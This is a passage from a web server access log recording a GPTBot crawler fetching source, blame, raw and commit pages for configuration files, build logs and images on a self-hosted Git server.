compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25620] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10281] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 15331] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11658] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 12552] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:14:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21019] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11233] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" +[17/Feb/2026:14:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 12581] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:14:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 21807] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:14:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" +[17/Feb/2026:14:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 20828] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:14:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10961] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" +[17/Feb/2026:14:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 13517] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" +[17/Feb/2026:14:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 10506] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" +[17/Feb/2026:14:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25598] [Gzip 11.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 13573] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" +[17/Feb/2026:14:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +[17/Feb/2026:14:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 10534] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" +[17/Feb/2026:14:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" +[17/Feb/2026:14:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10257] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9947] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +[17/Feb/2026:14:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:14:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 6062] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:14:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" +[17/Feb/2026:14:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" +[17/Feb/2026:14:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" +[17/Feb/2026:14:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641822] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692372] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +[17/Feb/2026:14:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9508] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:14:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9927] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" +[17/Feb/2026:14:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11628] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:14:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" +[17/Feb/2026:14:21:11 +0000] - 200 200 - GET https 